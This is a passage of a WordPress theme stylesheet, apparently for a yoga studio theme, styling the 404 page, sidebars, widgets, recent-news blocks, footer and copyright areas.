absolute;\r\n\tleft: 50%;\r\n}\r\n\r\n.post_item_404 .page_title,\r\n.post_item_404 .page_subtitle,\r\n.post_item_404 .page_description,\r\n.post_item_404 .page_search {\r\n\ttext-align:center;\r\n}\r\n.post_item_404 .page_title {\r\n\tfont-size: 3.125em;\r\n\tline-height:1em;\r\n\tmargin-bottom: 0;\r\n\tmargin-top:0.45em;\r\n}\r\n.post_item_404 .page_subtitle {\r\n\tfont-size: 2em;\r\n\tline-height:1em;\r\n\tmargin-bottom: 0.8125em;\r\n\tmargin-top: 0.5em;\r\n}\r\n.post_item_404 .page_description {\r\n\tmargin-bottom: 1.85em;\r\n\tmargin-top: 1.5em;\r\n}\r\n\r\n.post_item_404 .page_description a{\r\n\ttext-decoration: underline;\r\n}\r\n\r\n.post_item_404 .page_search {\r\n\tmargin-bottom:3em\r\n}\r\n.post_item_404 .page_search .search_wrap {\r\n\tmax-width:36%;\r\n\tmargin:0 auto;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n/* 8.8 Team member\r\n-------------------------------------------------------------- */\r\n\r\n/* Share block */\r\n.post_item_single_team .post_info_share_horizontal {\r\n\tmargin:2em 0;\r\n}\r\n\r\n\r\n\r\n\r\n/* 9. Sidebars\r\n-------------------------------------------------------------- */\r\n\r\n/* Sidebar outer */\r\n.sidebar_outer_logo_wrap {\r\n\toverflow:hidden;\r\n}\r\n.sidebar_outer_logo {\r\n\tpadding: 1em 0;\r\n}\r\n.sidebar_outer_socials {\r\n\tpadding: 1em 1em 1em 0;\r\n}\r\n\r\n/* Side menu */\r\n.sidebar_outer_menu {\r\n\tposition:relative;\r\n\tpadding-top: 1em;\r\n\tmin-height:2em;\r\n}\r\n.sidebar_outer_menu_buttons {\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:0;\r\n\tdisplay:none;\r\n\tpadding-top:1.25em;\r\n}\r\n.sidebar_outer_menu_buttons a {\r\n\tdisplay:inline-block;\r\n\ttext-align:center;\r\n}\r\n.sidebar_outer_menu_buttons a.sidebar_outer_widgets_button {\r\n\tfont-size:1.25em;\r\n\twidth:1.5em;\r\n\theight:1.5em;\r\n\tline-height:1.5em;\r\n\tmargin-left:0.5em;\r\n}\r\n.sidebar_outer_menu_buttons a.sidebar_outer_menu_responsive_button {\r\n\tdisplay:none;\r\n\tfont-size:1.5em;\r\n\tline-height:1.5em;\r\n\tposition:relative;\r\n}\r\n.sidebar_outer_menu_buttons a.sidebar_outer_menu_responsive_button:before {\r\n\tdisplay:block;\r\n\twidth:1em;\r\n\theight: 1em;\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:0;\r\n}\r\n\r\n.sidebar_outer_menu ul {\r\n\tmargin:0;\r\n\tpadding:0;\r\n\tlist-style-type:none;\r\n}\r\n.sidebar_outer_menu ul li {\r\n\tposition:relative;\r\n\tmargin-bottom: 0;\r\n\tpadding-left:0 !important;\r\n}\r\n.sidebar_outer_menu li:before {\r\n\tdisplay:none;\r\n}\r\n\r\n.sidebar_outer_menu li li > a {\r\n\tposition:relative;\r\n\tdisplay:block;\r\n\tpadding:0.5em 1.5em;\r\n}\r\n\r\n.menu_side_nav {\r\n\tdisplay:none;\r\n}\r\n.menu_side_nav > li > a {\r\n\tdisplay:block;\r\n\tpadding: 0.5em;\r\n}\r\n.menu_side_nav > li ul {\r\n\tposition:absolute;\r\n\tborder: 1px solid #ddd;\r\n\twidth:220px;\r\n\tpadding: 0;\r\n\tdisplay:none;\r\n\tz-index:100000;\r\n}\r\n.menu_side_nav > li > ul {\r\n\tleft:270px;\r\n\ttop:-0.5em;\r\n}\r\n.sidebar_outer_right .menu_side_nav > li > ul {\r\n\tleft:-245px;\r\n}\r\n.menu_side_nav > li > ul ul {\r\n\tleft:222px;\r\n\ttop:-0.5em;\r\n}\r\n.sidebar_outer_right .menu_side_nav > li > ul ul {\r\n\tleft:-224px;\r\n}\r\n.menu_side_nav > li > ul ul.submenu_left {\r\n\tleft:-221px;\r\n}\r\n.menu_side_nav > li.menu-item-has-children > a {\r\n\tpadding-right:2em;\r\n}\r\n.menu_side_nav > li.menu-item-has-children > a:after {\r\n\tcontent: '\\e836';\r\n\tfont-family: 'fontello';\r\n\tposition:absolute;\r\n\tright:10px;\r\n\ttop:50%;\r\n\t-webkit-transform: translateY(-50%);\r\n\t-moz-transform: translateY(-50%);\r\n\ttransform: translateY(-50%);\r\n}\r\n.sidebar_outer_menu li li.menu-item-has-children > a:after {\r\n\tcontent: '\\e836';\r\n\tfont-family: 'fontello';\r\n\tposition:absolute;\r\n\tright:8px;\r\n\ttop:50%;\r\n\t-webkit-transform: translateY(-50%);\r\n\t-moz-transform: translateY(-50%);\r\n\ttransform: translateY(-50%);\r\n}\r\n.menu_side_nav li a:before {\r\n\tmargin-right:0.5em;\r\n}\r\n\r\n/* Responsive side menu */\r\n.menu_side_responsive,\r\n.menu_side_responsive ul {\r\n\tdisplay:none;\r\n}\r\n.sidebar_outer_menu .menu_side_responsive {\r\n\tpadding-top:2em;\r\n}\r\n.responsive_menu .menu_side_nav {\r\n\tdisplay:none !important;\r\n}\r\n.responsive_menu .sidebar_outer_menu_buttons {\r\n\tleft:0;\r\n\tpadding-right:3em;\r\n\tpadding-top:0.5em;\r\n}\r\n.responsive_menu .sidebar_outer_menu_buttons a.sidebar_outer_menu_responsive_button {\r\n\tdisplay:block;\r\n}\r\n.responsive_menu .sidebar_outer_menu_buttons a.sidebar_outer_widgets_button {\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop:0.5em;\r\n}\r\n.sidebar_outer_menu .menu_side_responsive ul {\r\n\tmargin-top: 0;\r\n}\r\n.sidebar_outer_menu .menu_side_responsive li {\r\n\tmargin:0;\r\n\tpadding: 0 0 0 1.5em !important;\r\n}\r\n.sidebar_outer_menu .menu_side_responsive li > a {\r\n\tdisplay:block;\r\n\tpadding: 0.5em;\r\n\tposition:relative;\r\n}\r\n.menu_side_responsive > li.menu-item-has-children > a:after,\r\n.menu_side_responsive li li.menu-item-has-children > a:after {\r\n\tcontent: '\\e828';\r\n\tfont-family: 'fontello';\r\n\tposition:absolute;\r\n\tright:10px;\r\n\ttop:50%;\r\n\t-webkit-transform: translateY(-50%);\r\n\t-moz-transform: translateY(-50%);\r\n\ttransform: translateY(-50%);\r\n}\r\n.menu_side_responsive > li.menu-item-has-children.opened > a:after,\r\n.menu_side_responsive li li.menu-item-has-children.opened > a:after {\r\n\tcontent: '\\e835';\r\n}\r\n\r\n\r\n/* Common rules */\r\n.sidebar_outer aside,\r\n.sidebar aside+aside {\r\n\tmargin-top: 3em;\r\n\tpadding-top: 1.55em;\r\n\tpadding-bottom: 2em;\r\n}\r\n\r\n.widget_area .widget_title {\r\n\tmargin-top:0;\r\n\tmargin-bottom: 0.75em;\r\n\tfont-size: 1.563em;\r\n\tfont-weight: 600;\r\n\tborder-bottom: 1px solid;\r\n\tpadding-bottom: 0.43em\r\n}\r\n.widget_area ul {\r\n\tlist-style-type:none;\r\n\tmargin-bottom:0;\r\n\tpadding-left:0;\r\n}\r\n.widget_area ul ul {\r\n\tmargin-top:0.5em;\r\n}\r\n.widget_area ul li {\r\n\tposition:relative;\r\n\tpadding-left: 1.7em;\r\n\tfont-size: 0.874em;\r\n\tfont-weight: 500;\r\n\tline-height: 2.05em;\r\n}\r\n.widget_area ul li:before {\r\n\tcontent: '\\e8f0';\r\n\tfont-family: 'fontello';\r\n\tposition:absolute;\r\n\tleft:1px;\r\n\ttop:0;\r\n\tpadding-left:1px;\r\n\tpadding-right:1px;;\r\n}\r\n\r\n.widget_area_inner ul li:before {\r\n\tfont-size:12px;\r\n}\r\n\r\n/* Tabs in widgets */\r\n.widget_area .sc_tabs.sc_tabs_style_2 .sc_tabs_titles li {\r\n\tfont-size:0.813em;\r\n}\r\n.widget_area .sc_tabs.sc_tabs_style_2 .sc_tabs_titles li+li {\r\n\tmargin-left: 1em;\r\n}\r\n.widget_area .sc_tabs.sc_tabs_style_2 .sc_tabs_titles li a {\r\n\tpadding: 5px 10px 3px 10px;\r\n\ttext-transform: capitalize;\r\n\tline-height: 1em;\r\n\tborder: none;\r\n\t-webkit-border-radius: 3px;\r\n\t-moz-border-radius: 3px;\r\n\tborder-radius: 3px;\t\r\n}\r\n.widget_area .sc_tabs.sc_tabs_style_2 .sc_tabs_content {\r\n\tpadding:10px 0 0 0;\r\n\tborder: none;\r\n}\r\n.widget_area .sc_tabs.sc_tabs_style_2 .sc_tabs_content {\r\n\t-webkit-border-radius: 0;\r\n\t-moz-border-radius: 0;\r\n\tborder-radius: 0;\t\r\n}\r\n\r\n\r\n/* Widget: Search */\r\n.widget_area .widget_product_search .search_form,\r\n.widget_area .widget_search .search_form {\r\n\tposition:relative;\r\n\toverflow:hidden;\r\n\t-webkit-border-radius: 5px;\r\n\t-moz-border-radius: 5px;\r\n\tborder-radius: 5px;\r\n}\r\n.widget_area .widget_product_search .search_button,\r\n.widget_area .widget_search .search_button {\r\n\ttext-align:center;\r\n\tborder:none;\r\n\tbackground:none;\r\n}\r\n.widget_area_inner .widget_product_search .search_field,\r\n.widget_area_inner .widget_search .search_field {\r\n\tpadding-right:30px;\r\n\tpadding-left:8px;\r\n\tbackground:none;\r\n\tborder:none;\r\n\twidth: 100%;\r\n\theight: 2.5em;\r\n\tline-height: 2.5em;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.widget_area_inner .widget_product_search .search_button,\r\n.widget_area_inner .widget_search .search_button {\r\n\tposition:absolute;\r\n\tright: 0;\r\n\ttop:0;\r\n\tpadding:0;\r\n\twidth: 2.5em;\r\n\theight: 2.5em;\r\n\tline-height: 2.5em;\r\n\t-webkit-box-shadow: none;\r\n\t-moz-box-shadow: none;\r\n\tbox-shadow: none;\r\n}\r\n\r\n/* Widget: Calendar */\r\n.widget_area .widget_calendar table {\r\n\twidth: 100%;\r\n}\r\n.widget_area .widget_calendar .weekday {\r\n\tfont-size: 0.875em;\r\n\tfont-weight: 700;\r\n\ttext-transform:uppercase;\r\n}\r\n.widget_area .widget_calendar td .day_wrap {\r\n\tdisplay:block;\r\n\tposition:relative;\r\n\tborder:2px solid transparent;\r\n\tpadding:1px 4px;\r\n\t-webkit-border-radius: 4px;\r\n\t-moz-border-radius: 4px;\r\n\tborder-radius: 4px;\r\n}\r\n\r\n.widget_area .widget_calendar th,\r\n.widget_area .widget_calendar td {\r\n\tfont-weight:400;\r\n\ttext-align:center;\r\n\tborder-width:0;\r\n\tpadding:0;\r\n}\r\n.widget_area .widget_calendar th {\r\n\tpadding:10px 4px;\r\n}\r\n.widget_area .widget_calendar td {\r\n\tfont-size:0.875em\r\n\tpadding:0;\r\n}\r\n.widget_area .widget_calendar .month_cur {\r\n\tfont-size: 1em;\r\n\tfont-weight: 700;\r\n}\r\n.widget_area .widget_calendar .month_prev a,\r\n.widget_area .widget_calendar .month_next a {\r\n\tdisplay:block;\r\n}\r\n.widget_area .widget_calendar .month_prev a:before,\r\n.widget_area .widget_calendar .month_next a:before {\r\n\tfont-family: 'fontello';\r\n\tdisplay: inline-block;\r\n\tfont-size: 12px;\r\n\tpadding-left: 1px;\r\n\tpadding-right: 1px;\r\n}\r\n.widget_area .widget_calendar .month_prev a:before {\r\n\tcontent: '\\e8f0';\r\n\ttransform:rotate(180deg);\r\n\t-webkit-transform:rotate(180deg);\r\n\t-moz-transform:rotate(180deg);\r\n\t-ms-transform:rotate(180deg);\r\n\t-o-transform:rotate(180deg);\r\n}\r\n.widget_area .widget_calendar .month_next a:before {\r\n\tcontent: '\\e8f0';\r\n}\r\n\r\n/* Widget: RSS */\r\n\r\n.widget_area .widget_rss .widget_title a {\r\n\tdisplay:inline-block;\r\n\tmargin-right:6px;\r\n}\r\n\r\n.widget_area .widget_rss .widget_title a:first-child{\r\n\tdisplay: none;\r\n}\r\n\r\n.widget_area .widget_rss .widget_title img {\r\n\tvertical-align:baseline;\r\n}\r\n.widget_area .widget_rss {\r\n\tcolor: #222222;\r\n}\r\n\r\n.widget_area .widget_rss .rssSummary{\r\n\tdisplay: none;\r\n}\r\n\r\n.widget_area .widget_rss .rss-date{\r\n\tdisplay: block;\r\n\tfont-size: 0.811em;\r\n\tfont-weight: 700;\r\n\tfont-family: 'Montserrat';\r\n\ttext-transform: lowercase;\r\n\tmargin-top: -0.8em;\r\n}\r\n\r\n\r\n.widget_area .widget_rss li {\r\n\tpadding-left: 0;\r\n\tmargin-bottom: 0;\r\n\tborder-bottom: none;\r\n\r\n}\r\n\r\n.widget_area .widget_rss li+li{\r\n\tpadding-top: 1em;\r\n}\r\n\r\n.widget_area .widget_rss li:before,\r\n.widget_area .widget_rss li:after{\r\n\tcontent: none;\r\n}\r\n\r\n.widget_area .widget_rss li > a {\r\n\tfont-size: 1em;\r\n\tfont-weight: 600;\r\n}\r\n\r\n/* Widget: Tag Cloud */\r\n.widget_area .widget_product_tag_cloud,\r\n.widget_area .widget_tag_cloud {\r\n\toverflow:hidden;\r\n}\r\n.widget_area .widget_product_tag_cloud a,\r\n.widget_area .widget_tag_cloud a {\r\n\tdisplay:block;\r\n\tfloat:left;\r\n\tpadding:0px 9px;\r\n\tmargin:0 5px 5px 0;\r\n\tfont-size:0.929em !important;\r\n\tborder-radius: 1em;\r\n\t-moz-border-radius: 1em;\r\n\t-webkit-border-radius: 1em;\r\n}\r\n\r\n/* Widget: Tag Cloud */\r\n.widget_area .widget_product_tag_cloud,\r\n.widget_area .widget_tag_cloud {\r\n\toverflow:hidden;\r\n}\r\n.widget_area .widget_product_tag_cloud a,\r\n.widget_area .widget_tag_cloud a {\r\n\tdisplay:block;\r\n\tfloat:left;\r\n\tpadding:2px 10px;\r\n\tmargin:0 5px 5px 0;\r\n\tfont-size:0.75em !important;\r\n\tborder: 2px solid #ddd;\r\n}\r\n.widget_area .widget_product_tag_cloud a:hover,\r\n.widget_area .widget_tag_cloud a:hover {\r\n\tbackground-color: transparent !important;\r\n}\r\n\r\n/* Widget: YogaStudio Advertisement */\r\n.widget_area .widget_advert .image_wrap {\r\n\toverflow:hidden;\r\n\tdisplay:block;\r\n\tmargin-bottom:1em;\r\n}\r\n\r\n\r\n/* Widget: YogaStudio Flickr */\r\n.widget_area .widget_flickr {\r\n\toverflow:hidden;\r\n}\r\n.widget_area .widget_flickr .flickr_images {\r\n\tmargin-right:-5px;\r\n}\r\n.widget_area .widget_flickr .flickr_badge_image {\r\n\tfloat:left;\r\n\tmargin:0 5px 5px 0;\r\n\toverflow:hidden;\r\n\twidth:31%;\r\n\theight:auto;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.widget_area .widget_flickr .flickr_badge_image img {\r\n\twidth: 100%;\r\n}\r\n\r\n\r\n/* Widget: YogaStudio Logo and Socials */\r\n.widget_area .widget_socials .sc_socials {\r\n\tmargin-top:1em;\r\n}\r\n\r\n\r\n/* Widget: YogaStudio Twitter */\r\n.widget_area .widget_twitter ul li {\r\n\tpadding-left:1.5em;\r\n}\r\n.widget_area .widget_twitter ul li:before {\r\n\tcontent: '\\e89a';\r\n\tfont-size:1em;\r\n\tleft:0;\r\n}\r\n\r\n/* Widget: Recent News + Shortcode Recent News */\r\n.sc_recent_news_header {\r\n\tpadding-bottom: 1em;\r\n\tborder-bottom: 3px solid #000;\r\n\tmargin-bottom:2em;\r\n}\r\n.sc_recent_news_header_captions,\r\n.sc_recent_news_header_categories {\r\n\tdisplay: inline-block;\r\n\tvertical-align:bottom;\r\n}\r\n.sc_recent_news_header_split .sc_recent_news_header_captions,\r\n.sc_recent_news_header_split .sc_recent_news_header_categories {\r\n\twidth:50%;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.sc_recent_news_header_split .sc_recent_news_header_captions {\r\n\tpadding-right:2em;\r\n}\r\n.sc_recent_news_title {\r\n\tmargin:0;\r\n\tline-height:1.5em;\r\n\ttext-transform:uppercase;\r\n\tfont-weight: bold;\t\r\n}\r\n.sc_recent_news_subtitle {\r\n\tmargin: 0;\r\n\tline-height:1.5em;\r\n\tfont-size:1em;\r\n\ttext-transform:uppercase;\r\n\tfont-size:0.9231em;\r\n}\r\n.sc_recent_news_header_split .sc_recent_news_header_categories {\r\n\tline-height:1.5em;\r\n\ttext-align: right;\r\n}\r\n.sc_recent_news_header_split .sc_recent_news_header_categories > * {\r\n\tdisplay:inline-block;\r\n\tmargin-left: 1em;\r\n\ttext-transform:uppercase;\r\n\tfont-size:0.9231em;\r\n}\r\n.sc_recent_news_header_category_item_more {\r\n\tposition:relative;\r\n\tcursor:pointer;\r\n}\r\n.sc_recent_news_header_category_item_more:after {\r\n\tcontent: '\\e828';\r\n\tfont-family:'fontello';\r\n\tdisplay:inline-block;\r\n\tmargin-left:0.5em;\r\n\t-webkit-transition: all ease .3s;\r\n\t-moz-transition: all ease .3s;\r\n\t-ms-transition: all ease .3s;\r\n\t-o-transition: all ease .3s;\r\n\ttransition: all ease .3s;\r\n}\r\n.sc_recent_news_header_category_item_more.opened:after {\r\n\t-webkit-transform:rotate(180deg);\r\n\t-moz-transform:rotate(180deg);\r\n\t-ms-transform:rotate(180deg);\r\n\ttransform:rotate(180deg);\r\n}\r\n.sc_recent_news_header_more_categories {\r\n\tdisplay:none;\r\n\tposition:absolute;\r\n\tright:0;\r\n\ttop: 2em;\r\n\tz-index:1;\r\n\tborder: 1px solid #eee;\r\n\ttext-align:left;\r\n\tpadding:0.5em 1px;\r\n}\r\n.sc_recent_news_header_more_categories > a {\r\n\tdisplay:block;\r\n\twhite-space:nowrap;\r\n\tline-height:2em;\r\n\tpadding:0 1.5em;\r\n}\r\n\r\n.sc_recent_news .post_item {\r\n\tbackground-color:transparent;\r\n\ttext-align:left;\r\n\toverflow:hidden;\r\n\tmargin-bottom:2.1427em;\r\n}\r\n.sc_recent_news .post_item + .post_item {\r\n\tpadding-top: 0 !important;\r\n\tmargin-top: 0 !important;\r\n}\r\naside .sc_recent_news .post_item.post_accented_on {\r\n\tmargin-bottom: 2.3077em;\r\n}\r\n.sc_recent_news_style_news-magazine .post_accented_border {\r\n\tborder-bottom: 1px solid #eee;\r\n\tpadding-bottom:2.3077em;\r\n}\r\n\r\n.sc_recent_news .post_item .post_thumb {\r\n\tfloat:none;\r\n\twidth: auto;\r\n\theight:auto;\r\n\tmargin:0;\r\n}\r\n\r\n.sc_recent_news .post_accented_on .post_featured {\r\n\tmargin-bottom:1.2857em;\r\n}\r\n.sc_recent_news_with_accented .post_accented_off .post_featured {\r\n\tfloat: left;\r\n\tpadding-right:1.5em;\r\n\tmargin-bottom: 0;\r\n\twidth: 35%;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.sc_recent_news_with_accented .post_accented_off .post_header {\r\n\tfloat:left;\r\n\twidth:65%;\r\n}\r\n.sc_recent_news_without_accented .post_accented_off .post_featured {\r\n\tmargin-bottom:1em;\r\n}\r\n.sc_recent_news .post_featured .post_info {\r\n\tposition:absolute;\r\n\tleft: 0;\r\n\tbottom:0;\r\n\tpadding: 0.5em;\r\n\tz-index:10;\r\n\tfont-size: 1em;\r\n\tfont-style:normal;\r\n}\r\n.sc_recent_news .post_featured .post_info .post_categories {\r\n\tdisplay:inline-block;\r\n\tpadding:0 0.5em;\r\n\tline-height:1.5em;\r\n\tfont-size:0.7692em;\r\n\tfont-weight: bold;\r\n\tbackground-color: #000000;\r\n}\r\n.sc_recent_news .post_featured .post_info *,\r\n.sc_recent_news .post_featured .post_info *:hover {\r\n\tcolor: #ffffff;\r\n\ttext-shadow:1px 1px #000;\r\n}\r\n\r\n.sc_recent_news .post_header {\r\n\ttext-align:left;\r\n}\r\n.sc_recent_news .post_item .post_title {\r\n\tmargin: 0;\r\n\tfont-size: 1.5em;\r\n}\r\n.sc_recent_news .post_meta {\r\n\tmargin-top: 0.3em;\r\n\tfont-size:0.8462em;\r\n\tline-height:1.5em;\r\n}\r\n.sc_recent_news .post_meta_author,\r\n.sc_recent_news .post_meta_date {\r\n\tdisplay:inline-block;\r\n}\r\n.sc_recent_news .post_meta_date:before {\r\n\tcontent: '|';\r\n\tdisplay:inline-block;\r\n\tmargin:0 0.6em;\r\n\tposition:relative;\r\n\ttop: -1px;\r\n}\r\n\r\n.sc_recent_news .post_content {\r\n\tmargin-top:1em;\r\n}\r\n.sc_recent_news .post_content p {\r\n\tmargin:0;\r\n}\r\n\r\n.sc_recent_news .post_footer {\r\n\tmargin-top: 1.2857em;\r\n\toverflow:hidden;\r\n}\r\n.sc_recent_news .post_counters {\r\n\ttext-align:left;\r\n\tfloat:none;\r\n\twidth: 100%;\r\n\tline-height:1.8em;\r\n}\r\n.sc_recent_news .post_counters_item,\r\n.sc_recent_news .post_counters .post_edit a {\r\n\tpadding:0 1em;\r\n\tfont-size:0.8462em;\r\n\tmargin-left:0 !important;\r\n\tmargin-right:0.5em;\r\n\tfloat:left;\r\n}\r\n.sc_recent_news .post_counters_item .post_counters_number {\r\n\tmargin-left:0.5em;\r\n}\r\n.sc_recent_news .post_counters .post_edit:before {\r\n\tdisplay:none;\r\n}\r\n.sc_recent_news .post_counters .post_edit a:before {\r\n\tcontent:'\\e8bb';\r\n\tfont-family:'fontello';\r\n\tdisplay:inline-block;\r\n\tmargin-right:0.5em;\r\n}\r\n\r\n.sc_recent_news .post_delimiter {\r\n\tmargin-bottom: 2.3077em;\r\n}\r\n.sc_recent_news .post_delimiter:before {\r\n\tcontent: ' ';\r\n\tdisplay:block;\r\n\theight:0;\r\n\tborder-top: 1px solid #eee;\r\n}\r\n\r\n/* Style Excerpt */\r\n.sc_recent_news_style_news-excerpt {\r\n\toverflow:hidden;\r\n}\r\n.sc_recent_news_style_news-excerpt .post_item {\r\n\tpadding-bottom:2.3077em;\r\n\tborder-bottom: 1px solid #eee;\r\n}\r\n.sc_recent_news_style_news-excerpt .post_featured {\r\n\tmargin-bottom:0;\r\n\tpadding-right:2.5em;\r\n\tfloat:left;\r\n\twidth:33.3333%;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.sc_recent_news_style_news-excerpt .post_body {\r\n\toverflow:hidden;\r\n\tfloat:left;\r\n\twidth:66.6667%;\r\n}\r\n.sidebar_show .sc_recent_news_style_news-excerpt .post_featured,\r\n.vc_column_container .sc_recent_news_style_news-excerpt .post_featured,\r\n.columns_wrap .sc_recent_news_style_news-excerpt .post_featured {\r\n\twidth:50%;\r\n}\r\n.sidebar_show .sc_recent_news_style_news-excerpt .post_body,\r\n.vc_column_container .sc_recent_news_style_news-excerpt .post_body,\r\n.columns_wrap .sc_recent_news_style_news-excerpt .post_body {\r\n\twidth:50%;\r\n}\r\n\r\n/* Style Portfolio & Announce */\r\n.sc_recent_news_style_news-portfolio .columns_wrap {\r\n\tmargin-right: -0.4615em !important;\r\n}\r\n.sc_recent_news_style_news-portfolio [class*=\"column-\"] {\r\n\tpadding: 0 0.4615em 0.4615em 0 !important;\r\n}\r\n.sc_recent_news_style_news-portfolio .post_item,\r\n.sc_recent_news_style_news-portfolio .post_featured,\r\n.sc_recent_news_style_news-announce .post_item,\r\n.sc_recent_news_style_news-announce .post_featured {\r\n\tmargin-bottom:0 !important;\r\n}\r\n.sc_recent_news_style_news-portfolio .post_featured .post_info,\r\n.sc_recent_news_style_news-announce .post_featured .post_info {\r\n\tpadding: 1em 1.5em;\r\n}\r\n.sc_recent_news_style_news-announce {\t\t\t\t\toverflow:hidden; }\r\n.sc_recent_news_style_news-announce .post_item {\t\tfloat:left; }\r\n.sc_recent_news_style_news-announce .post_size_full {\twidth:100%; height: 432px; }\r\n.sc_recent_news_style_news-announce .post_size_big {\twidth:50%; height: 216px; }\r\n.sc_recent_news_style_news-announce .post_size_medium {\twidth:50%; height: 108px;  }\r\n.sc_recent_news_style_news-announce .post_size_small {\twidth:25%; height: 108px; }\r\nbody.sidebar_hide .sc_recent_news_style_news-announce .post_size_full { height: 656px; }\r\nbody.sidebar_hide .sc_recent_news_style_news-announce .post_size_big { height: 328px;  }\r\nbody.sidebar_hide .sc_recent_news_style_news-announce .post_size_medium,\r\nbody.sidebar_hide .sc_recent_news_style_news-announce .post_size_small { height: 164px;  }\r\n\r\n\r\n\r\n/* 10. Footer areas\r\n-------------------------------------------------------------- */\r\n\r\n/* Footer widgets */\r\n.footer_wrap_inner {\r\n\tpadding: 4.95em 0 1em;\r\n}\r\n.footer_wrap aside {\r\n\tmargin-bottom:1.5em;\r\n}\r\n\r\n.footer_wrap.widget_area .post_item .post_title{\r\n\theight: 1em;\r\n}\r\n\r\n.footer_wrap.widget_area .post_item .post_title{\r\n\theight: 1em;\r\n}\r\n\r\n.footer_wrap.widget_area .widget_title{\r\n\tborder:none;\r\n\tpadding-bottom: 1.2em;\r\n}\r\n\r\n.footer_wrap .widget_recent_reviews .post_item .post_title{\r\n\theight: 2.75em;\r\n}\r\n\r\n.footer_wrap .menu-site-links-container{\r\n\tmargin-top: -7px;\r\n}\r\n\r\n.footer_wrap .menu-site-links-container ul > li{\r\n\twidth: 36%;\r\n\tbox-sizing: border-box;\r\n\tdisplay: inline-block;\r\n}\r\n\r\n\r\n/* Contacts */\r\n.contacts_wrap_inner {\r\n\tpadding:5.2em 0 3.45em;\r\n\ttext-align:center;\r\n}\r\n.contacts_wrap .logo {\r\n\ttext-align:center;\r\n\tmargin-bottom: 2em;\r\n}\r\n.contacts_wrap .logo .logo_text {\r\n\tfont-size:2em;\r\n}\r\n.contacts_wrap .logo img {\r\n\tvertical-align:middle;\r\n\tdisplay:inline-block;\r\n}\r\n\r\n.contacts_address address{\r\n\talign-items: center;\r\n\tflex-direction:column;\r\n\tdisplay: flex;\r\n\tdisplay: -webkit-flex;\r\n}\r\n\r\n.contacts_address address span.icon{\r\nborder-radius: 50%;\r\n-webkit-border-radius: 50%;\r\n-moz-border-radius: 50%;\r\ndisplay: block;\r\nwidth: 124px;\r\nheight: 124px;\r\nline-height: 124px;\r\nfont-size: 3.3em;\r\n}\r\n\r\n.contacts_address address .contact_title{\r\n\tmargin-top: 1.8em;\r\n\t    font-family: \"Catamaran\", sans-serif;\r\n    font-size: 1.438em;\r\n    line-height: 1.3em;\r\n    font-weight: 600;\r\n\t    margin-bottom: 0.7em;\r\n}\r\n\r\n.contacts_address address .contact_item{\r\n\tfont-size: 1.125em;\r\n}\r\n\r\n\r\n/* Testimonials and Twitter area */\r\n.testimonials_wrap.sc_section,\r\n.twitter_wrap.sc_section {\r\n\tpadding: 0;\r\n}\r\n.testimonials_wrap_inner,\r\n.twitter_wrap_inner {\r\n\tbackground-repeat:no-repeat;\r\n\tbackground-position:center top;\r\n}\r\nfooter.testimonials_wrap .sc_section_overlay,\r\nfooter.twitter_wrap .sc_section_overlay {\r\n\tpadding: 3em 0;\r\n}\r\n\r\n\r\n/* Copyright area */\r\n.copyright_wrap_inner {\r\n\t    padding: 4.45em 0 3.3em 0;\r\n\toverflow:hidden;\r\n}\r\n.copyright_wrap p {\r\n\tmargin:0;\r\n}\r\n.copyright_style_text {\r\n\ttext-align:center;\r\n}\r\n\r\n.copyright_wrap_inner .content_wrap{\r\n\tdisplay: flex;\r\n\tdisplay: -webkit-flex;\r\n\tflex-direction: column;\r\n\talign-items: center;\r\n}\r\n\r\n.copyright_style_socials .copyright_text{\r\n\tpadding-top: 0.65em;\r\n\tfont-size: 0.813em;\r\n\tfont-weight: 500;\r\n}\r\n\r\n.copyright_wrap_inner .logo{\r\n    margin-bottom: 0.75em;\r\n}\r\n\r\n.copyright_wrap_inner .copyright_text{\r\n\t    margin-bottom: 1.5em;\r\n}\r\n\r\n.copyright_wrap_inner .logo img{\r\n\theight: 29px;\r\n}\r\n\r\n.copyright_wrap_inner .sc_socials{\r\n\tmargin-right: -0.55em;\r\n}\r\n\r\n.copyright_style_socials .copyright_wrap_inner {\r\n\tborder-top: 1px solid;\r\n}\r\n.copyright_style_menu .menu_footer_nav {\r\n\tmargin:0;\r\n\tpadding:0;\r\n\tlist-style:none;\r\n\ttext-align:right;\r\n}\r\n.menu_relayout .copyright_style_socials .copyright_text,\r\n.menu_relayout .copyright_style_menu .copyright_text,\r\n.responsive_menu .copyright_style_socials .copyright_text,\r\n.responsive_menu .copyright_style_menu .copyright_text,\r\n.menu_relayout .copyright_wrap .sc_socials,\r\n.responsive_menu .copyright_wrap .sc_socials,\r\n.menu_relayout .menu_footer_nav,\r\n.responsive_menu .menu_footer_nav {\r\n\tfloat: none;\r\n\ttext-align:center;\r\n}\r\n.menu_relayout .copyright_style_socials .copyright_text,\r\n.menu_relayout .copyright_style_menu .copyright_text,\r\n.responsive_menu .copyright_style_socials .copyright_text,\r\n.responsive_menu .copyright_style_menu .copyright_text {\r\n\tmargin-top:1em;\r\n}\r\n.menu_relayout .copyright_wrap .sc_socials,\r\n.responsive_menu .copyright_wrap .sc_socials {\r\n\tdisplay:block;\r\n}\r\n\r\n.copyright_style_menu .menu_footer_nav li {\r\n\tdisplay:inline-block;\r\n\tmargin-bottom:0;\r\n}\r\n.copyright_style_menu .menu_footer_nav li+li:before {\r\n\tcontent:'|';\r\n\tdisplay:inline-block;\r\n\tmargin:0 0.5em;\r\n}\r\n\r\n\r\n\r\n/* 11. Utils\r\n-------------------------------------------------------------- */\r\n\r\n/* Table of contents */\r\n#toc {\r\n\tposition:fixed;\r\n\tz-index:999;\r\n\ttop: 0;\r\n\tbottom:0;\r\n\tright: 0;\r\n\twidth: 60px;\r\n}\r\n#toc a { color: #ffffff; 